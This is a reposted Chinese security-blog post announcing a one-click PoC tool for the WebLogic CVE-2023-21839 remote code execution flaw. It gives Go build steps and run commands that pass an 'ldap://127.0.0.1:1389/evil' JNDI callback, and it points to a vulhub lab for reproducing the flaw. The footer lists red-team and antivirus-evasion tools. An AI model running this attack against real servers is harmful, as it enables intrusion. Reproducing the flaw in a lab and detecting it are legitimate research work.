N!Weblogic CVE-2023-21839 RCE

admin 2023年7月9日11:35:24评论46 views字数 1198阅读3分59秒阅读模式

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧设为星标”,否则可能看不到了


项目简介

Weblogic CVE-2023-21839/CVE-2023-21931/CVE-2023-21979 一键检测工具,这是来自长亭xray的代码,该漏洞扫描已集成到新版本xray中。

无需任何Java依赖,构造协议通过socket直接RCE已解决IIOP的NAT网络问题(可测试Docker与公网目标)在Windows/Mac OS/Linux以及Weblogic 12/14中测试通过请使用JDK 8u191以下启动Weblogic并自行搭建JNDI Server


注意:本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。

因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。


工具使用

你可以通过 vulhub 复现:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

Linux/Mac OS

cd cmdgo build -o CVE-2023-21839./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmdgo build -o CVE-2023-21839.exeCVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能)


本地测试:
N!Weblogic CVE-2023-21839 RCE


某师傅公网测试:

N!Weblogic CVE-2023-21839 RCE


下载地址

点击下方名片进入公众号

回复关键字【230708】获取下载链接


信 安 考 证



需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,还送【潇湘信安】知识星球1年!

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

N!Weblogic CVE-2023-21839 RCE

往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0

POCbomber红队快速打点漏洞检测工具

原文始发于微信公众号(Hack分享吧):N!Weblogic CVE-2023-21839 RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月9日11:35:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   N!Weblogic CVE-2023-21839 RCEhttp://cn-sec.com/archives/1861655.html

发表评论

匿名网友 填写信息